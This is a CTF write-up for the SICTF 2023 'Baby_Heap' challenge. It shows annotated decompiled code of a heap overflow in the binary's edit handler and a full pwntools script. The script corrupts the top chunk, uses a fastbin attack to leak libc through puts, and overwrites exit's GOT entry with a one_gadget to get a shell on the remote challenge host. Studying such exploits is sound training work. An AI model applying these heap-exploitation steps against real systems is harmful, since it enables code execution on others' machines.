SICTF 2023 #Round2 PWN-Baby_Heap
heap overflow
// Decompiler output (IDA-style pseudocode) of the binary's "edit" menu handler.
// Reads an index and a size from stdin, then read()s up to `size` bytes into
// the pointer stored at chunk_ptr[index].  Two checks are missing, and that
// is the heap overflow the writeup relies on:
//   * the index (v0) is never range-checked, so a negative or too-large value
//     indexes outside the chunk_ptr array;
//   * size is only capped at 0x1000 and never compared with the allocation
//     behind chunk_ptr[v0], so a larger request writes past that chunk.
// Mitigation: reject out-of-range indices and empty slots, and bound `size`
// by the length recorded for that slot when it was allocated.
void __fastcall edit()
{
    int v0; // [rsp+0h] [rbp-10h] BYREF  -- user-supplied index, never validated
    _DWORD size[3]; // [rsp+4h] [rbp-Ch] BYREF  -- size[0] = requested length; size[1..2] hold the canary copy below
    *(_QWORD *)&size[1] = __readfsqword(0x28u); // stack-protector canary (fs:0x28) saved next to size[0]
    v0 = 0;
    size[0] = 0;
    puts("Index :");
    __isoc99_scanf("%d", &v0); // scanf result unchecked; v0 stays 0 if parsing fails
    puts("Size :");
    __isoc99_scanf("%d", size);
    // Unsigned compare: a negative size becomes a large unsigned value and is
    // rejected here, but anything up to 0x1000 passes regardless of how big
    // the allocation at chunk_ptr[v0] actually is.
    if ( size[0] > 0x1000u )
    {
        puts("too large");
        exit(0);
    }
    puts("Content :");
    read(0, chunk_ptr[v0], size[0]); // heap overflow: no index bound, no per-chunk size bound; read() return value ignored
}
简单题,覆盖topchunk形成fastbin attack,任意申请到chunk ptr这里,改got就行
# pwntools harness for the challenge above.  The binary's edit handler
# (decompiled listing above) passes a user-chosen size to read() without
# checking it against the chunk's allocation; that is the bug this script uses.
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './baby_heap'
# ANSI-coloured print helpers (li: info, ll: errors); ll is defined but unused below.
li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')
context.terminal = ['tmux','splitw','-h']
# NOTE(review): the flag name is inverted relative to its effect -- debug=1
# connects to the remote CTF instance, debug=0 runs the local binary.
debug = 1
if debug:
    r = remote('210.44.151.51', 10037)
else:
    r = process(file_name)
elf = ELF(file_name)  # used below for GOT addresses (elf.got[...])
def dbg():
    """Attach gdb to the live tube `r` (pwntools opens it in the tmux split set in context.terminal)."""
    gdb.attach(r)
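def dbgg():
    """Block until a line is entered on stdin -- a manual pause point used
    before the first request so a debugger can be attached by hand.

    The original called raw_input(), which only exists on Python 2 and
    raises NameError on Python 3; fall back to input() there.  The typed
    line is discarded.
    """
    try:
        raw_input()
    except NameError:  # Python 3: raw_input() was renamed to input()
        input()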
menu = b'>\n'
def add(size, content):
    """Drive menu option 1: answer the `Size :` prompt with `size` (as a
    decimal line) and the `Content :` prompt with `content`, which is sent
    raw without a trailing newline."""
    size_reply = str(size)
    r.sendlineafter(menu, b'1')
    r.sendlineafter(b'Size :', size_reply)
    r.sendafter(b'Content :', content)
def edit(index, size, content):
    """Drive menu option 2: answer the `Index :` and `Size :` prompts with
    decimal lines, then send `content` raw at the `Content :` prompt."""
    line_replies = [(b'Index :', str(index)), (b'Size :', str(size))]
    r.sendlineafter(menu, b'2')
    for prompt, reply in line_replies:
        r.sendlineafter(prompt, reply)
    r.sendafter(b'Content :', content)
def show(index):
    """Drive menu option 3 and select `index`; the caller reads whatever the
    binary prints in reply from `r` afterwards."""
    index_reply = str(index)
    r.sendlineafter(menu, b'3')
    r.sendlineafter(b'Index :', index_reply)
dbgg()  # manual pause before the first request (see dbgg: raw_input is Python 2 only)

# Every size and offset below is specific to this challenge binary and to the
# libc build loaded further down; nothing is derived at runtime.  Each edit()
# sends more bytes than the slot was requested with, which the binary allows
# because its edit handler only caps size at 0x1000 (decompiled listing above).
add(0x10,'a' * 0x4) #0
p1 = p64(0) * 3 + p64(0xfe1)            # 0x20 bytes into slot 0, requested with size 0x10
edit(0, len(p1), p1)
add(0xf40, 'a' * 8)
add(0x100, 'a' * 8)
bd = 0x4040c0                           # hard-coded address in the binary (assumes no PIE -- not verifiable from here)
p2 = b'\x00' * 0xf48 + p64(0x71) + p64(bd)
edit(1, len(p2), p2)                    # 0xf58 bytes into slot 1, requested with size 0xf40
add(0x60, 'a' * 8)
p3 = b'\x00'                            # unused: the add(0x60, p3) call below is commented out
#add(0x60, p3)
add(0, '')
add(0, '')
add(0, '')
add(0, '')
add(0x71, 'a')
add(0, '')
add(0, '')
add(0, '')
add(0, '')
add(0, '')
add(0, '')
add(0, '')
puts_got = elf.got['puts']
p4 = b'\x00' * 0x10 + p64(puts_got)
add(0x60, p4)
show(0)
# Leak: keep the last 6 bytes up to the 0x7f high byte of the printed pointer
# and zero-extend to 8 (the str delimiter is encoded by pwntools; bytes elsewhere).
data = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('data = ' + hex(data))
libc = ELF('./2.23/libc-2.23.so')       # must be the remote's exact libc build; every offset below depends on it
libc_base = data - libc.sym['puts']
li('libc_base = ' + hex(libc_base))
system_addr = libc_base + libc.sym['system']   # computed and logged but not used below
li('system_addr = ' + hex(system_addr))
# one_gadget offsets for that libc-2.23 build only; regenerate for any other build.
one = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
one_gadget = one[3] + libc_base
exit_got = elf.got['exit']
edit(16, 0x18, b'\x00' * 0x10 + p64(exit_got))
edit(0, 0x8, p64(one_gadget))
# Trigger: a size above the 0x1000 cap makes the binary call exit(), which now
# goes through the rewritten GOT entry.  The add handler is not shown above;
# presumably it rejects oversized requests the same way edit() does.
r.sendlineafter(menu, '1')
r.sendline(str(0x100000))
r.interactive()